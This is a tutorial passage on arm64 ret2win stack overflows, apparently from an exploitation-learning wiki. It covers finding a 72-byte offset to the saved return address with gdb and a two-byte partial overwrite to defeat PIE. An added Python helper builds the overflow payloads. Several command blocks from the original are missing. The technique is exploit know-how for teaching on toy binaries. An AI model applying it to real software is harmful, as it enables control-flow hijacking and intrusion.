Ret2win - arm64
Find an introduction to arm64 in:
Compile without pie and canary:
Start gdb with gef, create a pattern and use it:
arm64 will try to return to the address in register x30 (which was overwritten with part of the pattern), so we can use that value to find the pattern offset:
The offset is 72 (0x48).
Start by getting the stack address where the pc register is stored:
Now set a breakpoint after the read(), continue until the read() is executed and enter a pattern such as 13371337:
Find where this pattern is stored in memory:
Then: 0xfffffffff148 - 0xfffffffff100 = 0x48 = 72
Get the address of the win function:
Exploit:
Actually, this is going to be more like an off-by-2 on the PC stored in the stack. Instead of overwriting the whole return address, we are going to overwrite only its last 2 bytes with 0x06c4.
Compile the binary without the -no-pie argument:
Without a leak we don't know the exact address of the win function, but we do know its offset inside the binary, and the return address we are overwriting already points to a nearby address in the same image. So it is enough to take the offset of the win function from the binary (0x7d4 in this case) and overwrite only the low bytes of the saved return address with that offset:
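The offset and partial-overwrite arithmetic from this walkthrough, as an added example that is not part of the original page: it reproduces the 72-byte offset from the gdb addresses above, builds the full (non-PIE) and two-byte (PIE) overwrites, and checks the two conditions that decide whether a two-byte write can reach win(). The names ret_site_offset and resulting_pc, the 64 KiB PIE base alignment, and the sample values other than those quoted from the page are assumptions.

```python
import struct

# Values observed in the gdb session above
BUF_ADDR = 0xFFFFFFFFF100       # stack address where the 13371337 pattern landed
SAVED_PC_ADDR = 0xFFFFFFFFF148  # stack slot holding the saved x30
WIN_OFFSET = 0x7D4              # offset of win() inside the PIE binary


def ret_offset(buf_addr, saved_pc_addr):
    """Bytes from the start of the buffer to the saved return address (72 here)."""
    return saved_pc_addr - buf_addr


def full_overwrite(offset, win_addr):
    """Non-PIE payload: padding up to the saved x30, then win() as an 8-byte little-endian word."""
    return b"A" * offset + struct.pack("<Q", win_addr)


def partial_overwrite(offset, ret_site_offset, win_offset):
    """PIE payload that rewrites only the two low bytes of the saved x30.

    ret_site_offset is the image-relative offset of the original return address
    (hypothetical name; read it from the disassembly). The untouched upper six
    bytes keep the original page bits, so the trick only works when the return
    site and win() lie in the same 64 KiB window of the image (assuming the PIE
    base is 64 KiB aligned) and win() is 4-byte aligned (arm64 instruction size).
    """
    if win_offset % 4:
        raise ValueError("arm64 return target must be 4-byte aligned")
    if ret_site_offset >> 16 != win_offset >> 16:
        raise ValueError("return site and win() differ above the low 16 bits; 2 bytes cannot reach")
    return b"A" * offset + struct.pack("<H", win_offset & 0xFFFF)


def resulting_pc(saved_ret, payload, offset):
    """Simulate the saved x30 after `payload` overflows a buffer `offset` bytes below it."""
    tail = payload[offset:offset + 8]          # at most the 8 bytes of the slot
    raw = bytearray(struct.pack("<Q", saved_ret))
    raw[:len(tail)] = tail                     # little-endian: low bytes come first
    return struct.unpack("<Q", bytes(raw))[0]
```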
This example was created using :
You can find another off-by-one example in ARM64 in , which is a real off-by-one in a fictitious vulnerability.